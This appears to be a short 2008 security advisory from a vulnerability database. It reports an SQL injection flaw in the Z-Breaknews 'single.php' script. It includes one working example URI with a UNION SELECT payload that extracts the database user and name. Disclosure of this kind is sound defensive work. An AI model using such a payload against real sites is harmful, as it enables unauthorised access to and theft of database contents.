Z-Breaknews 'single.php' SQL Injection Vulnerability

2008.08.27
Credit: dark-coders
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

>Z-Breaknews 'single.php' SQL Injection Vulnerability >Class: Input Validation Error >D!scutIon Z-Breaknews is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input before using it an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. >Expl0!T Attackers can use a browser to exploit this issue. The following example URI is available: http://www.example.com/single.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user(),database()),3,4,5/* >ThX 2 BlackXHat ; Mr.swish ; Mr.Dangers & M-A-H T3am

References:

http://pdesigner.net/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top